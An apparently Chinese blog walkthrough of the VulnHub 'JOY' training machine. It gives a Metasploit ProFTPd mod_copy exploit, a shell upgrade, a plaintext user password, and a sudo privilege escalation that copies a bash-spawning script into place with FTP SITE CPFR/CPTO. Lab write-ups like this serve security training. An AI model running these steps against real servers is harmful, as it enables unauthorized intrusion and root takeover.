zoukankan      html  css  js  c++  java
  • JOY靶机

    仅供个人娱乐

    靶机信息

    下载地址:https://www.vulnhub.com/entry/digitalworldlocal-joy,298/

    一、主机扫描

    二、信息收集和漏洞利用


     

     

    FTP服务允许匿名用户(anonymous)登录

    或者

    由于version_control存在于patrick路径中,我们是没有权限去获取的,所以尝试将其转移到/upload路径中

    敏感信息

    ProFTPd: 1.3.5

    /var/www/tryingharderisjoy

    故障 更改ip

    use exploit/unix/ftp/proftpd_modcopy_exec

    set rhosts 192.168.74.130

    set sitepath /var/www/tryingharderisjoy

    run

    python -c 'import pty; pty.spawn("/bin/bash")'

    信息收集

    su -l patrick     apollo098765

    提权

    本地主机编写脚本

    echo "awk 'BEGIN {system("/bin/bash")}'" > test

    使用ftp上传到upload            anonymous

    在使用telnet转换一下路径

    site cpfr /home/ftp/upload/test

    site cpto /home/patrick/script/test

    使用脚本

    sudo /home/patrick/script/test   

    cd /root

    cat proof.txt

    搞定

    参考文章https://blog.csdn.net/weixin_44214107/article/details/101228240



  • 相关阅读:
    python的reduce()函数
    python的map()函数
    【RxJS 01】函数式编程
    【vs_dev】01 first one
    【Angular01】Angular First One ----附 ip 地址查询
    目录
    ECMA Script 6 something
    【git】打tag
    【work 0107】dione 搭建
    【nextjs】React SSR
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12883668.html
Copyright © 2011-2022 走看看